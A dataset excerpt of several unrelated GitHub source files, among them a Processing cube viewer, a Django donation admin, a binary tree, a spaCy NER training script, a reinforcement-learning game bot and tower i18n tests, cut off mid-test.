z_axis.border_color = color(0, 200, 0)
z_axis.scale([2000, 2000, 3000])
# Poliedro de teste
cubo = Polyhedron()
cubo.addVertex([-1, -1, -1]) # A, 0
cubo.addVertex([-1, 1, -1]) # B, 1
cubo.addVertex([1, 1, -1]) # C, 2
cubo.addVertex([1, -1, -1]) # D, 3
cubo.addVertex([-1, -1, 1]) # E, 4
cubo.addVertex([-1, 1, 1]) # F, 5
cubo.addVertex([1, 1, 1]) # G, 6
cubo.addVertex([1, -1, 1]) # H, 7
cubo.addEdge([0, 1])
cubo.addEdge([1, 2])
cubo.addEdge([2, 3])
cubo.addEdge([3, 0])
cubo.addEdge([4, 5])
cubo.addEdge([5, 6])
cubo.addEdge([6, 7])
cubo.addEdge([7, 4])
cubo.addEdge([0, 4])
cubo.addEdge([1, 5])
cubo.addEdge([2, 6])
cubo.addEdge([3, 7])
cubo.scale([100, 100, 100])
cubo.translate([(width/2), (height/2), 0])
cubo.info = True
cubo.border_color = 255
Polyhedron.proj_angle = 45
cubo.render()
def draw():
background(0)
if controls:
fill(95)
textSize(16)
text(controls_string_on, 100, 20)
text(controls_string_extra, width-100, 20)
x_axis.render()
y_axis.render()
z_axis.render()
else:
fill(95)
textSize(16)
text(controls_string_off, width/2, 20)
cubo.render()
def keyPressed():
global controls
# Controle da ajuda
if key == TAB:
controls = True if not controls else False
# Controle de reset
elif key == BACKSPACE:
reset()
# Controles de translação
elif key == 'Q' or key == 'q':
cubo.translation[0] += 20
elif key == 'W' or key == 'w':
cubo.translation[0] -= 20
elif key == 'E' or key == 'e':
cubo.translation[1] += 20
elif key == 'R' or key == 'r':
cubo.translation[1] -= 20
elif key == 'T' or key == 't':
cubo.translation[2] += 20
elif key == 'Y' or key == 'y':
cubo.translation[2] -= 20
# Controles de escala
elif key == 'A' or key == 'a':
cubo.scaling[0] += 5
elif key == 'S' or key == 's':
cubo.scaling[0] -= 5
elif key == 'D' or key == 'd' :
cubo.scaling[1] += 5
elif key == 'F' or key == 'f' :
cubo.scaling[1] -= 5
elif key == 'G' or key == 'g' :
cubo.scaling[2] += 5
elif key == 'H' or key == 'h' :
cubo.scaling[2] -= 5
# Controles de rotação
elif key == 'Z' or key == 'z' :
cubo.rotation[0] += 5
elif key == 'X' or key == 'x' :
cubo.rotation[0] -= 5
elif key == 'C' or key == 'c' :
cubo.rotation[1] += 5
elif key == 'V' or key == 'v' :
cubo.rotation[1] -= 5
elif key == 'B' or key == 'b' :
cubo.rotation[2] += 5
elif key == 'N' or key == 'n' :
cubo.rotation[2] -= 5
# Controle da troca de projeção
elif key == 'P' or key == 'p':
Polyhedron.render_method = (Polyhedron.render_method + 1) % 3
def reset():
global cubo
cubo.scale([100, 100, 100])
cubo.translate([(width/2), (height/2), 0])
cubo.rotate([0, 0, 0])
| felipedeoliveirarios/trabalho_cg | Old/polyhedron/polyhedron.pyde | polyhedron.pyde | pyde | 11,006 | python | en | code | 1 | github-code | 13 |
7830089880 | from django.contrib import admin
from cl.donate.models import Donation, MonthlyDonation
@admin.register(Donation)
class DonationAdmin(admin.ModelAdmin):
readonly_fields = (
"date_modified",
"date_created",
)
list_display = (
"__str__",
"amount",
"payment_provider",
"status",
"date_created",
"referrer",
)
list_filter = (
"payment_provider",
"status",
"referrer",
)
raw_id_fields = ("donor",)
class DonationInline(admin.StackedInline):
model = Donation
extra = 0
@admin.register(MonthlyDonation)
class MonthlyDonationAdmin(admin.ModelAdmin):
readonly_fields = (
"date_created",
"date_modified",
)
list_display = (
"__str__",
"donor_id",
"enabled",
"monthly_donation_amount",
"failure_count",
"monthly_donation_day",
)
list_filter = (
"enabled",
"failure_count",
"monthly_donation_day",
)
raw_id_fields = ("donor",)
class MonthlyDonationInline(admin.TabularInline):
model = MonthlyDonation
extra = 0
| freelawproject/courtlistener | cl/donate/admin.py | admin.py | py | 1,156 | python | en | code | 435 | github-code | 13 |
12188156003 | class ListNode:
# 节点超级工厂,用来生产二叉树中的节点
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class Tree:
def __init__(self):
# 初始化一棵空树:树根为None
self.root = None
def add(self, item):
# 在二叉树增加一个节点
node = ListNode(item)
# 空树
if not self.root:
self.root = node
return
list01 = [self.root]
while True:
cur = list01.pop(0)
# 判断左孩子
if cur.left:
list01.append(cur.left)
else:
cur.left = node
break
# 判断右孩子
if cur.right:
list01.append(cur.right)
else:
cur.right = node
break
def breadth_travel(self):
"""
广度遍历:从上到下,从左到右
:return:
"""
if not self.root:
return
list01 = [self.root]
while list01:
cur = list01.pop(0)
print(cur.val, end=" ")
# 判断左孩子
if cur.left:
list01.append(cur.left)
# 判断右孩子
if cur.right:
list01.append(cur.right)
if __name__ == "__main__":
t = Tree()
t.add(1)
t.add(2)
t.add(3)
t.add(4)
t.add(5)
t.add(6)
t.add(7)
t.add(8)
t.add(9)
# 终端1: 1 2 3 4 5 6 7 8 9
t.breadth_travel()
| 15149295552/Code | Month09/day04_DATASTRUCT/code/04_binary_tree.py | 04_binary_tree.py | py | 1,599 | python | ja | code | 1 | github-code | 13 |
26000757342 | from __future__ import unicode_literals, print_function
import pickle
import plac
import random
from pathlib import Path
import spacy
from spacy.util import minibatch, compounding
import os
from os import listdir
import plac
import logging
import argparse
import sys
import json
import pickle
from PIL import Image
import os.path, sys
import matplotlib.pyplot as plt
# importing pandas module
import pandas as pd
import csv
path= os.path.abspath("./him.csv")
path2=os.path.abspath("./")
# making data frame from csv file
data = pd.read_csv(path, sep='/t', encoding = 'unicode_escape')
# dropping passed columns
# data.drop(["Unnamed: 2"], axis = 1, inplace = True)
# display
data
#save as csv
data.to_csv(r'docs(1).csv', index = False)
#csv to tsv
with open('docs(1).csv','r') as csvin, open('ner_dataset1.txt', 'w') as tsvout:
csvin = csv.reader(csvin)
tsvout = csv.writer(tsvout, delimiter=',')
for row in csvin:
tsvout.writerow(row)
# Convert .tsv file to dataturks json format.
import json
import logging
import sys
def tsv_to_json_format(input_path,output_path,unknown_label):
try:
f=open(input_path,'r') # input file
fp=open(output_path, 'w') # output file
data_dict={}
annotations =[]
label_dict={}
s=''
start=0
for line in f:
if line[0:len(line)-1]!='\t':
word,entity=line.split('\t')
s+=word+" "
# print(s)
entity=entity[:len(entity)-1]
if entity!=unknown_label:
if len(entity) != 1:
d={}
d['text']=word
d['start']=start
d['end']=start+len(word)-1
try:
label_dict[entity].append(d)
except:
label_dict[entity]=[]
label_dict[entity].append(d)
start+=len(word)+1
else:
data_dict['content']=s
s=''
label_list=[]
for ents in list(label_dict.keys()):
for i in range(len(label_dict[ents])):
if(label_dict[ents][i]['text']!=''):
l=[ents,label_dict[ents][i]]
for j in range(i+1,len(label_dict[ents])):
if(label_dict[ents][i]['text']==label_dict[ents][j]['text']):
di={}
di['start']=label_dict[ents][j]['start']
di['end']=label_dict[ents][j]['end']
di['text']=label_dict[ents][i]['text']
l.append(di)
label_dict[ents][j]['text']=''
label_list.append(l)
for entities in label_list:
label={}
label['label']=[entities[0]]
label['points']=entities[1:]
annotations.append(label)
data_dict['annotation']=annotations
annotations=[]
json.dump(data_dict, fp)
print(data_dict)
fp.write('\n')
data_dict={}
start=0
label_dict={}
except Exception as e:
logging.exception("Unable to process file" + "\n" + "error = " + str(e))
return None
tsv_to_json_format(r"ner_dataset1(3)(1).txt",r'ner_dataset11.json','abc')
#spacy format
# @plac.annotations(input_file=("/content/demo.json", "option", "i", str), output_file=("/content/out.json", "option", "o", str))
def main(input_file='ner_dataset11.json', output_file='out.json'):
try:
training_data = []
lines=[]
with open(input_file, 'r') as f:
lines = f.readlines()
for line in lines:
data = json.loads(line)
text = data['content']
entities = []
for annotation in data['annotation']:
point = annotation['points'][0]
labels = annotation['label']
if not isinstance(labels, list):
labels = [labels]
for label in labels:
entities.append((point['start'], point['end'] + 1 ,label))
training_data.append((text, {"entities" : entities}))
# print(training_data)
with open(output_file, 'wb') as fp:
pickle.dump(training_data, fp)
except Exception as e:
logging.exception("Unable to process " + input_file + "\n" + "error = " + str(e))
return None
main()
# New entity labels
# Specify the new entity labels which you want to add here
LABEL = [u'invoiceno', u'invoicedate', u'customer', u'vendor', u'product', u'address', u'amount']
with open ('out.json', 'rb') as fp:
TRAIN_DATA = pickle.load(fp)
# @plac.annotations(
# model=("Model name. Defaults to blank 'en' model.", "option", "m", str),
# new_model_name=("New model name for model meta.", "option", "nm", str),
# output_dir=("Optional output directory", "option", "o", Path),
# n_iter=("Number of training iterations", "option", "n", int))
def main(model=None, new_model_name='new_model', output_dir= path2 , n_iter=10):
"""Setting up the pipeline and entity recognizer, and training the new entity."""
if model is not None:
nlp = spacy.load(model) # load existing spacy model
print("Loaded model '%s'" % model)
else:
nlp = spacy.blank('en') # create blank Language class
print("Created blank 'en' model")
if 'ner' not in nlp.pipe_names:
ner = nlp.create_pipe('ner')
nlp.add_pipe(ner)
else:
ner = nlp.get_pipe('ner')
# for i in LABEL:
# ner.add_label(i) # Add new entity labels to entity recognizer
for _, annotations in TRAIN_DATA:
for ent in annotations.get('entities'):
ner.add_label(ent[2])
if model is None:
optimizer = nlp.begin_training()
else:
optimizer = nlp.entity.create_optimizer()
# Get names of other pipes to disable them during training to train only NER
other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']
with nlp.disable_pipes(*other_pipes): # only train NER
for itn in range(n_iter):
random.shuffle(TRAIN_DATA)
losses = {}
batches = minibatch(TRAIN_DATA, size=compounding(4., 32., 1.001))
for batch in batches:
texts, annotations = zip(*batch)
nlp.update(texts, annotations, sgd=optimizer, drop=0.35,
losses=losses)
print('Losses', losses)
# save model to output directory
new= os.path.abspath("./him.11")
output_dir1 = new
if output_dir1 is not None:
output_dir1 = Path(output_dir1)
if not output_dir1.exists():
output_dir1.mkdir()
nlp.to_disk(output_dir1)
print("Saved model to", output_dir1)
main()
| Teknowmics-Internship/Invoice-extraction | NER Train model (1).py | NER Train model (1).py | py | 7,353 | python | en | code | 0 | github-code | 13 |
2526262426 | import random
from sys import maxsize
from copy import deepcopy
import json
import numpy as np
import torch
from torch.optim import Adam
from . import gamelib
from . import constants
from . import utils
from .arch.model import FeatureEncoder, PolicyNet
"""
Most of the algo code you write will be in this file unless you create new
modules yourself. Start by modifying the 'on_turn' function.
Advanced strategy tips:
- You can analyze action frames by modifying on_action_frame function
- The GameState.map object can be manually manipulated to create hypothetical
board states. Though, we recommended making a copy of the map to preserve
the actual current map state.
"""
class AlgoStrategy(gamelib.AlgoCore):
def __init__(self, args):
super().__init__()
seed = random.randrange(maxsize)
random.seed(seed)
gamelib.debug_write('Random seed: {}'.format(seed))
self.device = 'cpu'
gamelib.debug_write('Using {}'.format(self.device))
self.is_learning = args.is_learning
if self.is_learning:
gamelib.debug_write("I'm LEARNING!")
self.lr = 0.01
self.is_enemy = args.is_enemy
if self.is_enemy:
gamelib.debug_write("I'm EVIL so I'm not LEARNING! Ignoring is_learning...")
self.is_learning = False
self.is_prod = args.is_prod
if self.is_prod:
gamelib.debug_write("Production mode. Ignoring is_learning, is_enemy...")
self.is_learning = False
self.is_enemy = False
self.checkpoint_manager = utils.CheckpointManager(self.is_enemy, self.is_prod)
def on_game_start(self, config):
"""
Read in config and perform any initial setup here
"""
gamelib.debug_write('Configuring your custom algo strategy...')
self.config = config
global WALL, SUPPORT, TURRET, SCOUT, DEMOLISHER, INTERCEPTOR, MP, SP, STRUCTURE_ONEHOT
WALL = config["unitInformation"][0]["shorthand"]
SUPPORT = config["unitInformation"][1]["shorthand"]
TURRET = config["unitInformation"][2]["shorthand"]
SCOUT = config["unitInformation"][3]["shorthand"]
DEMOLISHER = config["unitInformation"][4]["shorthand"]
INTERCEPTOR = config["unitInformation"][5]["shorthand"]
MP = 1
SP = 0
STRUCTURE_ONEHOT = {WALL: [1, 0, 0], SUPPORT: [0, 1, 0], TURRET: [0, 0, 1]}
# This is a good place to do initial setup
self.scored_on_locations = []
self.setup_policy_net()
if self.is_learning:
self.setup_vanila_policy_gradient()
def setup_policy_net(self):
self.feature_encoder = FeatureEncoder().to(self.device)
self.policy = PolicyNet(self.device).to(self.device)
if self.is_learning:
params = list(self.feature_encoder.parameters()) + list(self.policy.parameters())
self.optimizer = Adam(params, lr=self.lr)
if self.checkpoint_manager.checkpoint_exists():
gamelib.debug_write('Loading model weights...')
feature_encoder_path, policy_path, optimizer_path = self.checkpoint_manager.get_latest_model_path()
self.feature_encoder.load_state_dict(torch.load(feature_encoder_path))
self.policy.load_state_dict(torch.load(policy_path))
if self.is_learning:
self.optimizer.load_state_dict(torch.load(optimizer_path))
self.memory_state = self.policy.init_hidden_state()
def on_turn(self, turn_state):
"""
This function is called every turn with the game state wrapper as
an argument. The wrapper stores the state of the arena and has methods
for querying its state, allocating your current resources as planned
unit deployments, and transmitting your intended deployments to the
game engine.
"""
game_state = gamelib.GameState(self.config, turn_state)
gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))
game_state.suppress_warnings(True) #Comment or remove this line to enable warnings.
self.policy_net_strategy(game_state)
game_state.submit_turn()
def policy_net_strategy(self, game_state):
if self.is_learning:
action_type_logps, location_logps = [], []
spatial_features, scalar_features = self.game_state_to_features(game_state)
observation_features = self.feature_encoder(spatial_features, scalar_features)
action_type = torch.tensor(9)
location = torch.tensor([0,0])
while action_type != constants.NOOP:
action_type, _, action_type_logp, location, _, location_logp, self.memory_state \
= self.policy(observation_features, action_type, location, game_state, self.memory_state)
if action_type in constants.STRUCTURES + constants.MOBILES:
game_state.attempt_spawn(constants.ACTION_SHORTHAND[action_type], [location])
elif action_type == constants.UPGRADE:
game_state.attempt_upgrade([location])
elif action_type == constants.REMOVE:
game_state.attempt_remove([location])
if self.is_learning:
action_type_logps.append(action_type_logp)
location_logps.append(location_logp)
# when all actions has been taken, flush the queue mask in policy net's action head
self.policy.flush_queue_mask()
if self.is_learning:
if game_state.turn_number > 0: # skip turn 0 reward
reward_prev_turn = self.compute_reward(game_state)
self.ep_rews.append(reward_prev_turn)
self.ep_action_type_logps.append(action_type_logps)
self.ep_location_logps.append(location_logps)
def game_state_to_features(self, game_state):
# spatial features
spatial_features = deepcopy(game_state.game_map._GameMap__map)
for x in range(len(spatial_features)):
for y in range(len(spatial_features[x])):
if len(spatial_features[x][y]) > 0:
unit = spatial_features[x][y][0]
feature = []
feature += STRUCTURE_ONEHOT[unit.unit_type]
feature += [unit.health]
feature += [unit.player_index==1, unit.player_index==2]
feature += list(map(int, [unit.pending_removal, unit.upgraded]))
# TODO: add features
spatial_features[x][y] = feature
else:
spatial_features[x][y] = [0] * 8
spatial_features = torch.tensor(spatial_features, dtype=torch.float).to(self.device)
spatial_features = spatial_features.permute(2, 0, 1)
spatial_features = torch.unsqueeze(spatial_features, 0)
# scalar features
# TODO: should data whitening be in model or here?
scalar_features = [game_state.my_health] + game_state.get_resources(0)
scalar_features += [game_state.enemy_health] + game_state.get_resources(1)
scalar_features += [game_state.turn_number]
scalar_features = torch.tensor(scalar_features, dtype=torch.float).to(self.device)
scalar_features = torch.unsqueeze(scalar_features, 0)
return spatial_features, scalar_features
# Methods for reinforcement learning
def on_final_reward(self,game_state_string):
if self.is_learning:
turn_state = json.loads(game_state_string)
# change of health
my_health = float(turn_state.get('p1Stats')[0])
enemy_health = float(turn_state.get('p2Stats')[0])
reward = my_health - self.my_health
reward += self.enemy_health - enemy_health
# additional reward of winner or loser
self.winner = int(turn_state.get('endStats')['winner'])
win_or_not_reward = constants.WINNER_REWARD if self.winner == 1 else constants.LOSER_REWARD
reward += win_or_not_reward
# append the last reward
self.ep_rews.append(reward)
# get turn number in total
self.total_turn = int(turn_state.get('turnInfo')[1])
def on_game_end(self):
if self.is_learning:
# train
gamelib.debug_write('Optimizing policy network...')
self.optimizer.zero_grad()
episode_loss = self.compute_loss()
episode_loss.backward()
self.optimizer.step()
# log metrics
self.loss = episode_loss.item()
stats_dict = self.get_statistics()
gamelib.debug_write(stats_dict)
# checkpoint
self.checkpoint_manager.save_model(self.feature_encoder, self.policy, self.optimizer)
self.checkpoint_manager.save_stats(stats_dict)
def setup_vanila_policy_gradient(self):
self.my_health = self.enemy_health = self.config['resources']['startingHP']
self.ep_action_type_logps = []
self.ep_location_logps = []
self.ep_rews = []
def compute_reward(self, game_state):
reward = game_state.my_health - self.my_health
reward += self.enemy_health - game_state.enemy_health
self.my_health, self.enemy_health = game_state.my_health, game_state.enemy_health
return reward
def compute_loss(self):
self.action_lengths = [len(logps) for logps in self.ep_action_type_logps]
ep_weights = list(self.reward_to_go())
batch_weights = []
for action_len, weight in zip(self.action_lengths, ep_weights):
batch_weights.extend([weight / action_len] * action_len)
batch_action_type_logps = [logp for logps in self.ep_action_type_logps for logp in logps]
batch_location_logps = [logp for logps in self.ep_location_logps for logp in logps]
self.ep_ret = batch_weights
batch_weights = torch.tensor(batch_weights, dtype=torch.float32).to(self.device)
batch_action_type_logps = torch.cat(batch_action_type_logps)
batch_location_logps = torch.cat(batch_location_logps)
action_type_loss = -(batch_action_type_logps * batch_weights).mean()
location_loss = -(batch_location_logps * batch_weights).mean()
return action_type_loss + location_loss
def reward_to_go(self):
n = len(self.ep_rews)
rtgs = np.zeros_like(self.ep_rews)
gamma = constants.GAMMA
for i in reversed(range(n)):
rtgs[i] = self.ep_rews[i] + gamma*(rtgs[i+1] if i+1 < n else 0)
return rtgs
def get_statistics(self):
stats = dict()
# winner and turn_number
stats['winner'] = self.winner
stats['total_turn'] = self.total_turn
# policy gradient loss
stats['policy_gradient_loss'] = self.loss
# reward and return in theory
stats['episode_length'] = len(self.ep_rews)
stats['episode_return'] = sum(self.ep_rews)
stats['reward_mean'] = np.mean(self.ep_rews)
stats['reward_std'] = np.std(self.ep_rews)
stats['reward_max'] = max(self.ep_rews)
stats['reward_min'] = min(self.ep_rews)
# actual return experienced by the agent
stats['return_cumulative'] = sum(self.ep_ret)
stats['return_mean'] = np.mean(self.ep_ret)
stats['return_std'] = np.std(self.ep_ret)
stats['return_max'] = max(self.ep_ret)
stats['return_min'] = min(self.ep_ret)
# actions
stats['action_length_cumulative'] = sum(self.action_lengths)
stats['action_length_mean'] = np.mean(self.action_lengths)
stats['action_length_std'] = np.std(self.action_lengths)
stats['action_length_max'] = max(self.action_lengths)
stats['action_length_min'] = min(self.action_lengths)
return stats
| wllmzhu/alpha-terminal | python-algo/src/algo_strategy.py | algo_strategy.py | py | 12,225 | python | en | code | 1 | github-code | 13 |
24337818175 | import binascii
print("ENTER THE STRING")
input_string = raw_input()
str1 = binascii.unhexlify(input_string)
length = len(str1)
for i in range(0,255):
str2=""
for j in range(length):
str2 += chr(ord(str1[j])^i)
print(str2)
| nsg1999/cryptopals | Single_byte_XOR.py | Single_byte_XOR.py | py | 231 | python | en | code | 0 | github-code | 13 |
14288739346 | # -*- coding: utf-8 -*-
"""
Truncates string or JSON data so that it fits a specific number of characters.
"""
__author__ = "Jakrin Juangbhanich"
__email__ = "juangbhanich.k@gmail.com"
def truncate(message: str, max_length: int=128, split_ratio: float=0.8) -> str:
""" Truncates the message if it is longer than max_length. It will be split at the
'split_ratio' point, where the remaining last half is added on. """
if max_length == 0 or len(message) <= max_length:
return message
split_index_start = int(max_length * split_ratio)
split_index_end = max_length - split_index_start
message_segments = [message[:split_index_start], message[-split_index_end:]]
return " ... ".join(message_segments)
| krinj/logkit | logkit/utils/truncate.py | truncate.py | py | 737 | python | en | code | 4 | github-code | 13 |
797264922 | #!/usr/bin/env python
import itertools
'''
https://code.google.com/codejam/contest/8384486/dashboard#s=p2&a=2
Brute force solution
'''
def solve(l, names):
alphabet = set(''.join(names))
A = len(alphabet)
bools = [False] * 3
# Try all N! (for small dataset, 3!) alphabetical orderings
for ordering in itertools.permutations(range(A), A):
hashmap = dict(zip(alphabet, ordering))
# Order the names
ordered_names = list(enumerate([list(map(lambda x: hashmap[x], name)) for name in names]))
ordered_names.sort(key=lambda x: x[1])
mid_idx = ordered_names[1][0]
bools[mid_idx] = True
return " ".join(["YES" if bool else "NO" for bool in bools])
if __name__ == "__main__":
cases = int(input())
for case in range(1, cases+1):
l = int(input())
names = input().split()
print("Case #{}: {}".format(case, solve(l, names)))
'''
python3 centrists.py < C-small-attempt0.in > out-
diff out- out-C-small
'''
| christabella/code-busters | centrists_naive.py | centrists_naive.py | py | 1,002 | python | en | code | 2 | github-code | 13 |
74468148817 | '''
Main file to run, this will produce a video
using MatplotLib and display the results
within a GUI
'''
import matplotlib.pyplot as plt
import matplotlib.image as mimg
import os
import cv2
from models import GestureAngleClassifier
#Matplotlib jargon to setup GUI for one frame
def display_image(path, pred):
plt.clf()
plt.imshow(mimg.imread(path))
plt.text(0,0,pred[0] + ' Similarity: ' + str(pred[1]))
plt.pause(0.1)
plt.draw()
#Displays the videos of image
def display(input_folder):
SIZE = 20
FONT_SIZE = 22
model = GestureAngleClassifier('train_angles.npy', 'train_labels.npy') #Instantiating a model for classification
#Calibrating the Matplotlib GUI variables
plt.rcParams["figure.figsize"] = (SIZE,SIZE)
plt.rcParams.update({'font.size': FONT_SIZE})
plt.show()
#Display using frame-by-frame basis
for path in os.listdir(input_folder):
display_image('./similarity_output/openpose_result.jpg', model.get_predictions(input_folder + '/' + path))
display('./shot2') | AnshKetchum/gesture-classifier | gesture-by-angle-classifier/output.py | output.py | py | 1,048 | python | en | code | 0 | github-code | 13 |
7531728449 | from cStringIO import StringIO
import django
from django.utils import translation
import jingo
from jingo.tests.test_helpers import render
from mock import patch
from nose import with_setup
from nose.tools import eq_, ok_
import tower
from tower.tests.helpers import fake_extract_from_dir
from tower import ugettext as _, ungettext as n_
from tower import ugettext_lazy as _lazy, ungettext_lazy as n_lazy
from tower.management.commands.extract import create_pofile_from_babel
# Used for the _lazy() tests
_lazy_strings = {}
_lazy_strings['nocontext'] = _lazy('this is a test')
_lazy_strings['context'] = _lazy('What time is it?', 'context_one')
n_lazy_strings = {}
n_lazy_strings['s_nocontext'] = n_lazy('one light !', 'many lights !', 1)
n_lazy_strings['p_nocontext'] = n_lazy('one light !', 'many lights !', 3)
n_lazy_strings['s_context'] = n_lazy('%d poodle please', '%d poodles please',
1, 'context_one')
n_lazy_strings['p_context'] = n_lazy('%d poodle please', '%d poodles please',
3, 'context_one')
def setup():
tower.activate('xx')
def setup_yy():
tower.activate('yy')
def teardown():
tower.deactivate_all()
def test_install_jinja_translations():
jingo.env.install_null_translations()
tower.activate('xx')
eq_(jingo.env.globals['gettext'], _)
@patch.object(tower, 'INSTALL_JINJA_TRANSLATIONS', False)
def test_no_install_jinja_translations():
"""
Setting `TOWER_INSTALL_JINJA_TRANSLATIONS` to False should skip setting
the gettext and ngettext functions in the Jinja2 environment.
"""
jingo.env.install_null_translations()
tower.activate('xx')
ok_(jingo.env.globals['gettext'] != _)
@with_setup(setup, teardown)
def test_ugettext():
# No context
a_text = " this\t\r\n\nis a\ntest \n\n\n"
p_text = "you ran a test!"
eq_(p_text, _(a_text))
# With a context
a_text = "\n\tWhat time \r\nis it? \n"
p_text_1 = "What time is it? (context=1)"
p_text_2 = "What time is it? (context=2)"
eq_(p_text_1, _(a_text, 'context_one'))
eq_(p_text_2, _(a_text, 'context_two'))
@with_setup(setup, teardown)
def test_ugettext_not_found():
eq_('yo', _('yo'))
eq_('yo yo', _(' yo yo '))
eq_('yo', _('yo', 'context'))
eq_('yo yo', _(' yo yo ', 'context'))
@with_setup(setup, teardown)
def test_ungettext():
# No context
a_singular = " one\t\r\n\nlight \n\n!\n"
a_plural = " many\t\r\n\nlights \n\n!\n"
p_singular = "you found a light!"
p_plural = "you found a pile of lights!"
eq_(p_singular, n_(a_singular, a_plural, 1))
eq_(p_plural, n_(a_singular, a_plural, 3))
# With a context
a_singular = "%d \n\n\tpoodle please"
a_plural = "%d poodles\n\n\t please\n\n\n"
p_singular_1 = "%d poodle (context=1)"
p_plural_1 = "%d poodles (context=1)"
p_singular_2 = "%d poodle (context=2)"
p_plural_2 = "%d poodles (context=2)"
eq_(p_singular_1, n_(a_singular, a_plural, 1, 'context_one'))
eq_(p_plural_1, n_(a_singular, a_plural, 3, 'context_one'))
eq_(p_singular_2, n_(a_singular, a_plural, 1, 'context_two'))
eq_(p_plural_2, n_(a_singular, a_plural, 3, 'context_two'))
@with_setup(setup, teardown)
def test_ungettext_not_found():
eq_('yo', n_('yo', 'yos', 1, 'context'))
eq_('yo yo', n_(' yo yo ', 'yos', 1, 'context'))
eq_('yos', n_('yo', 'yos', 3, 'context'))
eq_('yo yos', n_('yo', ' yo yos ', 3, 'context'))
@with_setup(setup, teardown)
def test_ugettext_lazy():
eq_(unicode(_lazy_strings['nocontext']), 'you ran a test!')
eq_(unicode(_lazy_strings['context']), 'What time is it? (context=1)')
@with_setup(setup, teardown)
def test_ungettext_lazy():
eq_(unicode(n_lazy_strings['s_nocontext']), 'you found a light!')
eq_(unicode(n_lazy_strings['p_nocontext']), 'you found a pile of lights!')
eq_(unicode(n_lazy_strings['s_context']), '%d poodle (context=1)')
eq_(unicode(n_lazy_strings['p_context']), '%d poodles (context=1)')
def test_add_context():
eq_("nacho\x04testo", tower.add_context("nacho", "testo"))
def test_split_context():
eq_(["", u"testo"], tower.split_context("testo"))
eq_([u"nacho", u"testo"], tower.split_context("nacho\x04testo"))
def test_activate():
tower.deactivate_all()
tower.activate('xx')
eq_(_('this is a test'), 'you ran a test!')
tower.deactivate_all()
def test_activate_with_override_settings_and_django_14():
# Django 1.4 includes a handy override_settings helper. When you
# use that, it must not include SETTINGS_MODULE in the settings.
# This tests that activating a locale doesn't throw an
# AssertionError because there's no SETTINGS_MODULE in settings.
if django.VERSION >= (1, 4):
from django.test.utils import override_settings
with override_settings():
tower.deactivate_all()
tower.activate('xx')
# String is the same because it couldn't find
# SETTINGS_MODULE and thus didn't pick up the right .mo
# files.
eq_(_('this is a test'), 'this is a test')
tower.deactivate_all()
def test_cached_activate():
"""
Make sure the locale is always activated properly, even when we hit a
cached version.
"""
tower.deactivate_all()
tower.activate('fr')
eq_(translation.get_language(), 'fr')
tower.activate('fa')
eq_(translation.get_language(), 'fa')
tower.activate('fr')
eq_(translation.get_language(), 'fr')
tower.activate('de')
eq_(translation.get_language(), 'de')
tower.activate('fr')
eq_(translation.get_language(), 'fr')
tower.activate('fa')
eq_(translation.get_language(), 'fa')
@with_setup(setup, teardown)
def test_template_simple():
s = '{% trans %}this is a test{% endtrans %}'
eq_(render(s), 'you ran a test!')
s = '''{% trans %}
this
is
a
test
{% endtrans %}'''
eq_(render(s), 'you ran a test!')
@with_setup(setup, teardown)
def test_template_substitution():
s = '{% trans user="wenzel" %} Hello {{ user }}{% endtrans %}'
eq_(render(s), 'Hola wenzel')
s = '''{% trans user="wenzel" %}
Hello
\t\r\n
{{ user }}
{% endtrans %}'''
eq_(render(s), 'Hola wenzel')
@with_setup(setup, teardown)
def test_template_substitution_with_pluralization():
s = '''{% trans count=1 %}
one light !
{% pluralize %}
many lights !
{% endtrans %}'''
eq_(render(s), 'you found a light!')
s = '''{% trans count=8 %}
one light !
{% pluralize %}
many lights !
{% endtrans %}'''
eq_(render(s), 'you found a pile of lights!')
@with_setup(setup_yy, teardown)
def test_template_substitution_with_many_plural_forms():
s = '''{% trans count=1 %}
There is {{ count }} monkey.
{% pluralize %}
There are {{ count }} monkeys.
{% endtrans %}'''
eq_(render(s), 'Monkey count: 1 (Plural: 0)')
s = '''{% trans count=3 %}
There is {{ count }} monkey.
{% pluralize %}
There are {{ count }} monkeys.
{% endtrans %}'''
eq_(render(s), 'Monkey count: 3 (Plural: 1)')
s = '''{% trans count=5 %}
There is {{ count }} monkey.
{% pluralize %}
There are {{ count }} monkeys.
{% endtrans %}'''
eq_(render(s), 'Monkey count: 5 (Plural: 2)')
@with_setup(setup, teardown)
def test_template_gettext_functions():
s = '{{ _("yy", "context") }}'
eq_(render(s), 'yy')
s = '{{ gettext("yy", "context") }}'
eq_(render(s), 'yy')
s = '{{ ngettext("1", "2", 1, "context") }}'
eq_(render(s), '1')
def test_extract_tower_python():
fileobj = StringIO(TEST_PO_INPUT)
method = 'tower.extract_tower_python'
output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
method=method)
# god help you if these are ever unequal
eq_(TEST_PO_OUTPUT, unicode(create_pofile_from_babel(output)))
def test_extract_tower_template():
fileobj = StringIO(TEST_TEMPLATE_INPUT)
method = 'tower.extract_tower_template'
output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
method=method)
# god help you if these are ever unequal
eq_(TEST_TEMPLATE_OUTPUT, unicode(create_pofile_from_babel(output)))
def test_extract_tower_python_backwards_compatible():
fileobj = StringIO(TEST_PO_INPUT)
method = 'tower.management.commands.extract.extract_tower_python'
output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
method=method)
# god help you if these are ever unequal
eq_(TEST_PO_OUTPUT, unicode(create_pofile_from_babel(output)))
def test_extract_tower_template_backwards_compatible():
fileobj = StringIO(TEST_TEMPLATE_INPUT)
method = 'tower.management.commands.extract.extract_tower_template'
output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
method=method)
# god help you if these are ever unequal
eq_(TEST_TEMPLATE_OUTPUT, unicode(create_pofile_from_babel(output)))
TEST_PO_INPUT = """
# Make sure multiple contexts stay separate
_('fligtar')
_('fligtar', 'atwork')
_('fligtar', 'athome')
# Test regular plural form, no context
ngettext('a fligtar', 'many fligtars', 3)
# Make sure several uses collapses to one
ngettext('a fligtar', 'many fligtars', 1, 'aticecreamshop')
ngettext('a fligtar', 'many fligtars', 3, 'aticecreamshop')
ngettext('a fligtar', 'many fligtars', 5, 'aticecreamshop')
# Test comments
# L10N: Turn up the volume
_('fligtar \n\n\r\t talking')
# Test comments w/ plural and context
# l10n: Turn down the volume
ngettext('fligtar', 'many fligtars', 5, 'aticecreamshop')
